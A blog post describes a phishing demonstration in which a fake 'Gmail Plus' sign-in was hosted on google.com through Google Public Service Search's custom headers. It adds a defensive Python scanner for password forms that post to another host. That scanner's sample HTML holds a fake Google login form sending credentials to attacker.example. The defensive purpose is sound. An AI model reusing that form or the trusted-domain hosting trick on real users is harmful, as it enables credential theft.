I found a question this morning on Ask MetaFilter about a supposed new service called Gmail Plus. The URL, www.google.com/u/gplus, looked legit. In my pre-caffeinated state, I almost entered my Google username and password to see what sort of pre-announced Google service this MeFi-er had turned up. Instead, I went ahead and checked the comments and found that signing in would have been a very, very bad idea.
Turns out, it's a page created by Farraro to demonstrate a potential exploit in Google's Public Service Search:
This service is meant for universities or other non-profit organizations to add a 'Google' search to their website. It differs from the other free Google site search in that it allows you to customize the header and footer of the search results page. It's interesting to note that the code for your header and footer is actually hosted by Google, on their server.
Most phishing scams have a suspicious URL that an alert (or sometimes even semi-alert) user can spot easily. With the Google Public Service Search, though, users may not think anything of a service being hosted on Google itself. The "u/servicename" URL just doesn't look all that odd unless you're already familiar with the Public Service offering.
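As an added example (not from this post and not Farraro's demo page), here is the kind of heuristic a defender can run over a fetched page to catch exactly this pattern: a form with a password field, served from a trusted host, whose action submits the credentials to a different host. The sample HTML and the attacker.example host are constructed; only the /u/gplus URL comes from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect every <form> on the page and note whether it has a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []          # each entry: {"action": str, "has_password": bool}
        self._current = None     # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_credential_forms(page_url, html):
    """Return resolved action URLs of password forms that post to a host
    other than the one serving the page (the trusted-domain phishing tell)."""
    scanner = _FormScanner()
    scanner.feed(html)
    page_host = urlsplit(page_url).hostname
    suspicious = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        target = urljoin(page_url, form["action"])   # relative actions stay on-host
        if urlsplit(target).hostname != page_host:
            suspicious.append(target)
    return suspicious


# Constructed sample: a custom header fragment on a /u/ search results page that
# imitates a Google sign-in box but sends the credentials to an outside host.
SAMPLE_PAGE_URL = "https://www.google.com/u/gplus"
SAMPLE_HTML = """
<div class="header"><h1>Sign in to Gmail Plus</h1>
<form action="http://attacker.example/collect" method="post">
  <input name="Email"><input name="Passwd" type="password"><input type="submit">
</form></div>
<form action="/search"><input name="q"></form>
"""

if __name__ == "__main__":
    print(find_credential_forms(SAMPLE_PAGE_URL, SAMPLE_HTML))
```

The check only sees forms that post cross-host; a fragment that captured keystrokes with script instead of a form would not be flagged, so treat it as one signal, not a verdict.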
Farraro says he's notified Google security about the bug, but in the meantime, it would pay to be very careful, and avoid providing your Google credentials to any Google services with the /u/servicename construction.